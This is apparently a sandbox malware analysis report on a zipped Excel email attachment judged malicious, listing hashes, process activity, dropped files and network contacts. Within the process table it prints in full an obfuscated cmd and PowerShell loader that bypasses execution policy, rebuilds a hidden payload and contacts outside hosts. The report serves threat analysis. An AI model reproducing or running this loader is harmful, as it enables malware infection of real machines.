File name: | 100998860826-107-0_attach.1.20190212.DOC60807.xls.zip |
Full analysis: | https://app.any.run/tasks/a70ba5ba-c6e7-4ad5-838d-d860a10b3464 |
Verdict: | Malicious activity |
Analysis date: | February 18, 2019, 15:18:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | D991787AEC896290C4A989871F90A963 |
SHA1: | A555FA6F7FF70570BE4E0316CBAE3D121A84E2B0 |
SHA256: | EDD90A7A56A2ECA02C43B2589FA13B4B83104C9C38D603FEBA2D1D21B1CA2E98 |
SSDEEP: | 1536:XwEhYLZ807XIRQkLeH0FtZqBDyou3qCjVvYs3k3gH8MKFS9ZGSA:XwEhi807YRQHAt8BxkDZwSkZU98SA |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:02:18 16:16:06 |
ZipCRC: | 0x30f7d527 |
ZipCompressedSize: | 57329 |
ZipUncompressedSize: | 88582 |
ZipFileName: | 100998860826-107-0_attach.1.20190212.DOC60807.xls.tmp |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\100998860826-107-0_attach.1.20190212.DOC60807.xls.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3512 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2852 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2848 | "C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL intl.cpl | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3276 | C:\Windows\system32\mctadmin.exe | C:\Windows\system32\mctadmin.exe | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MCTAdmin Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2312 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3276 | cmD /C "sEt eIw=${d`EMo}='4 , 521,321,94 ,521,43 ,54,201, 93, 93 ,511,93 ,93 ,93,16,521 ,99,411 ,321 ,63(]][RAhC[, '''' ("nIo`j"::]GnIRTs[()''''nIOJ-''x''+]3,1[)("gni`R`tSoT".}ECNerE`F`ErPEsoB`rEV{$ ( . 83,04, 43 ,321, 84 , 521,43,54 ,201, 23 , 93, 93 ,101,401 ,93,93, 44 ,801,93,93,14 , 23 , 04,43 ,321 , 94 , 521,321 , 84 , 521 , 43 , 23,54 , 201, 93 ,93 , 99 ,611 ,93,93 , 44 , 93, 93,79,8 , 121 , 211 ,101, 93 , 93 ,44, 93 ,93 ,601 ,101,93,93 ,44 , 93,93 ,411 , 93, 93,14, 23,04 , 43 , 321, 05 , 521 ,321,94,521 ,321 ,84 , 521, 43 , 23 ,54,201 , 93, 93 ,54,489,93,93 ,14, 95 , 64, 04 , 43 ,321, 94 , 521 , 321 ,05, 521, 321,87, 101,911 ,54, 97,86 ,93,93 ,44 ,93 , 93 , 56, 001,93,93,44 , 93,93 ,84, 521, 321,94,521 , 43,23 , 54 ,201, 93 ,93 ,64, 87, 79 ,901 , 101 , 23, 04, 43, 321,05 , 521, 321, 801 ,121,89 , 86,93,93,44,93, 93 , 411 ,79 , 911 ,501 ,011, 301 ,93 , 93 , 44 , 93, 93,001 ,93 , 93 , 14 ,23,54,56 ,511 ,511, 101, 901,84 , 521 ,321 ,45, 521,43 ,54, 201 ,23 , 93 , 93 , 8 ,521 , 16 , 04,04 , 43, 321 , 05, 521 , 321,25 ,521,321 ,94, 521, 321, 15,521, 321,35,521,321 ,8,69 , 38 ,121 ,511 ,611,101,901,93 , 93 , 14 ,95 ,63,321 , 485,93 ,93 ,44 ,93, 93 ,711,411 ,64 , 99, 111, 901 , 74,93,93 ,44 , 93 , 93,401,611,611 , 211 , 511, 93,93 , 44,93, 93, 74,74 ,501,64,501 ,901,301, 93 ,93, 44,93 ,93, 38 , 93 ,93 , 44, 93, 93 ,8 ,511, 984, 98 , 76,84,521,321,45, 521, 321,65 ,521 ,43 , 23 ,54, 201,23 , 93, 93 ,311,67 ,93, 93 ,44,93,93 , 64, 211 ,011, 301,93, 93,14, 44 , 93 , 93, 74,74,74,289 , 74 ,25, 94 , 93 ,93 , 44,04,43 , 321 ,15 ,521, 321 , 35 ,521, 321 ,55, 521, 321,05 , 521 , 321 , 94 , 521, 321,25 ,521,321 ,85, 74 ,74, 501 , 901, 79, 301, 101,511 , 93, 93, 44,93 ,93 ,111, 021 ,64 ,99 , 111,901 , 93,93 , 44, 93, 93 ,74 ,74 , 74, 79 , 8 ,35 ,59,111 ,64, 211,011 ,93,93, 44 ,93 , 93 ,05,64 , 93,93 , 44 ,93 , 93 ,74,74 , 74 , 93 , 93,44 , 93 ,93 , 401, 611 ,611, 211, 511 , 89, 93, 93 , 44 ,93 , 93,65,05,021 ,15, 386 ,93 ,93 ,44 , 93 , 93 ,501,901,301, 84 , 521,43 ,54 ,201 ,23 ,93 ,93, 96 ,56 , 8 , 27, 97, 001, 43 , 23, 16 ,23 ,04, 43 , 321,94,521 ,321, 87 ,521 , 64,43 , 901 ,96 , 69 , 4801 ,521, 14,95, 63 , 321, 77, 8 , 8, 101, 43 ,04,63 , 321, 711 ,69, 28,69, 96 , 79 ,485, 43, 76, 285 ,8 , 101, 311,711 , 101 , 511, 611,39 , 89 ,28 ,101 , 87,101 ,611 , 64 , 78, 121,511, 611,101 , 901 ,64 , 8 ,521 , 14, 321 ,63,321,77, 011, 521,23 , 16,23 , 19 ,3801 ,521,23 ,501 ,011,23 ,63 , 321 ,611 ,38, 84,521,321 , 94 ,521, 43 ,23,54 , 201 , 93 ,93, 411 ,101 , 93 , 93, 44 ,93 , 93 ,301 , 93 , 93,14, 14, 95,201, 111 , 411,101 , 79 ,99,401, 04 ,63 ,321,711 ,69 ,28, 521, 16, 64,04,43 ,321, 86 , 69, 58,401 , 43 , 95, 23 , 501,201 ,23, 04,63 , 321 , 97,69 , 501 ,521 , 23 ,54 , 301 , 101 ,23, 25,25 , 25,25 ,14 ,321, 63 ,321,87,69, 17 , 69 , 4801 ,101,69,8,87,487 , 611 ,96, 87, 511 ,96, 43 ,04 , 14 ,95 , 63,321 ,111 , 69, 37 , 521,16, 63 , 321 ,111, 111,521 , 64, 43 ,76,111, 69,8, 211, 111, 69, 8 ,101 , 38,69,287 , 521,64 ,43 , 17, 69, 96, 486, 411 , 79 ,911,501 , 93 , 93,44 ,93, 93, 27 ,93 , 93,14, 95, 63 , 321, 97,97 ,521,23,16, 23 , 63 , 321 , 901 ,84,521, 321, 05, 521 , 321,25 ,521 ,43 ,23 , 54 ,201 , 93 ,93 ,64,8,121 , 511, 93,93 , 44 ,93, 93, 011,93, 93 , 44 ,93,93,611,101 ,901 ,93 , 93 ,44 ,93, 93 , 401,93, 93, 14 ,23, 04,43 ,321,15,521,321,94, 521 ,321,84 ,521 , 43 , 23 , 54, 201, 93 ,93 , 101 , 401, 93 ,93,44,93 ,93 ,383,04,43, 321,94 ,521 ,321, 87 ,101,611,93,93 ,44 ,93 , 93 , 301,64 , 66 , 501, 611,901 , 79, 211,93 ,93, 14 ,04 ,04, 84 ,521, 321 ,94 ,521, 321 ,05 ,521, 43,23, 54 , 201,93, 93,8, 101, 93,93,44,93,93 ,411 , 93,93 ,14 ,23, 04,43 , 321 ,84 , 521, 43,23 , 54, 201,23, 93,93, 401 , 93, 93, 44, 93,93 , 64, 783 , 04 ,43 ,321, 94 ,521 , 321, 801 ,521, 14 ,14 , 95 ,63 ,321 , 101 ,521,16 ,8, 86 ,43 ,04,63, 321,711, 69, 28,69, 96 , 011 , 411 ,69, 101, 56,801 , 501 , 101, 011,611, 93,93, 14,14 , 64 , 43 , 97, 089,76,84 , 521, 321, 94 ,521, 321, 05 ,521,43, 54,201, 23, 93 , 93, 66,121, 611 , 101,93, 93 , 44 ,93 , 93, 8 , 69, 501 ,521,44, 93 ,93,19 ,93, 93 , 44 , 93,93 ,411,101 ,93 , 93 , 14, 23 , 04,43 , 321 ,801 ,43 ,04 ,63, 321 , 18 , 69 , 501 ,021, 69 , 101,8 ,521,64,43,301,96 , 611 , 086 , 69,58,521 ,16,63 , 321 ,8,69 ,484, 64 ,64 ,05 ,94 , 75, 14, 14,321, 63 ,321,984, 64 , 64 , 05, 25,14 , 421, 64, 04,93 ,93 , 73 ,93 ,93 , 14, 321 ,201,111, 411, 101 , 79 , 99,401 ,04,63 , 321 ,311,69,37 , 521 , 23,501,011, 04, 84,95,04 ,84 , 84 ,521 ,321 ,94 ,521 ,43, 54, 201 , 93 ,93 , 37,93,93,44,93 , 93 ,39 ,93,93,14 , 23 ,35, 35,83, 04 ,43,321 ,89 , 79 ,011, 001, 23, 94,35, 14 , 14 , 521 , 521 , 95 ,8,521,64 ,43, 301 ,43 ,23,54,89,111 , 411 , 04,63,321 , 121,489,79 , 011, 001,94 ,35 ,14 , 24, 94 , 45, 14 ,54, 8 , 521, 64,43 ,66,43 , 54 , 8,43 , 04, 04,63 ,321,121,69,485 , 43 , 07,67 ,69 , 97,111,285, 84 ,34, 63,321 ,311 ,501 ,521, 39 ,16,04 , 19, 901, 79 ,611 ,401,39,89 , 411 ,101 ,79 ,701 , 521 ,521, 44 ,63 ,321 , 59 , 521, 14 ,95, 63 ,321,96 ,521, 19 , 63 ,321 ,59 ,521, 24 , 05,05 , 84 , 64 ,64 , 35 ,15 , 94 , 45, 39 ,14,14,95,87 ,301,43 ,04 , 63,321,96,521,19 , 8, 37 , 69 , 8, 28,511,48 , 76,69 , 501, 501, 43 ,64 , 43 , 301 , 69, 101 ,485, 43 , 79, 385 ,8 ,101 , 021 , 611 , 64 ,96 , 011 , 99, 111,001 , 501 ,011 ,301 , 39,8 , 121,511 , 611, 101 , 901 ,64 ,48 ,93,93,14, 04, 19 ,38801 ,211, 511, 54,23, 93,93 ,93, 96 , 8,97 ,76,43 , 64 , 521 ,99 ,411,321, 63, 04, 54,64, 64 , 94, 54, 19 ,521, 76, 411 , 321, 63 ,23 , 16, 23, 521 ,201,07 , 69, 96,321 ,63 ,95, 43,44 , 43 ,23 , 611, 501 , 87 , 69,58,801 ,43, 64 , 521,07,07,69, 101, 321, 63 , 04, 54,64,64,94, 54,19,521,07 , 07 ,69 ,101 , 321,63,16, 521,111, 67 ,321 , 63 , 95,43 ,44 , 43, 23 ,011 ,501 , 111 , 601 , 54 ,23 , 39 , 14,43 ,487 ,101 ,83 , 95 , 43 , 43 ,23, 011 ,501 , 111 , 601, 54,23 ,39 , 14,43, 27, 611 , 301 , 69 ,84,321,43 , 04, 801 , 321 ,63 , 04, 14 ,93 , 021 , 93 ,44,93 , 101, 501 ,93 ,23 ,201 ,54,23 ,43,521,94 ,321 ,521, 8 ) ) )14 ,521 , 97 ,' -split "8";${de} = ${d`EmO}[-1..-(${d`emO}."CoU`NT")] -join "8";${dD}=${De}[-1..-(${D`e}."L`En`GtH")] -join "";^&("{1}{0}"-f 'x','ie')(${d`D})&&SeT tRsY=pOwERSHELl -ExecUTIONPOLiC BYpaSs -nOni -NOPRoFiLe -WiN hIdden . ( \"{1}{0}\"-f 't','se') dCz2Y ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' ) ) ; ( $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p' ) ) )^^^| ^^^&( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') ( \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn'' )&& cmD/C %trSY%" | C:\Windows\system32\cmD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2612 | cmD /C %trSY% | C:\Windows\system32\cmd.exe | — | cmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2624 | pOwERSHELl -ExecUTIONPOLiC BYpaSs -nOni -NOPRoFiLe -WiN hIdden . ( \"{1}{0}\"-f 't','se') dCz2Y ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' ) ) ; ( $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p' ) ) )| &( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') ( \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn'' ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3632 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3512 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6AA0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3512 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFEBD37C007A0762B1.TMP | — | |
MD5:— | SHA256:— | |||
3512 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF725415BC979B92AA.TMP | — | |
MD5:— | SHA256:— | |||
2852 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA66C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2852 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF7BB3F022EB7BB100.TMP | — | |
MD5:— | SHA256:— | |||
2852 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF5BD562378ACDEDAD.TMP | — | |
MD5:— | SHA256:— | |||
2312 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6D17.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2624 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JLYO6YZWX0U1R8OF9A2J.temp | — | |
MD5:— | SHA256:— | |||
2312 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF58CF900576391DBE.TMP | — | |
MD5:— | SHA256:— | |||
2312 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF703E8726109A5084.TMP | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2624 | powershell.exe | 151.101.120.193:443 | i.imgur.com | Fastly | US | malicious |
2624 | powershell.exe | 194.76.225.64:443 | delegirato.pro | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
i.imgur.com |
| shared |
delegirato.pro |
| malicious |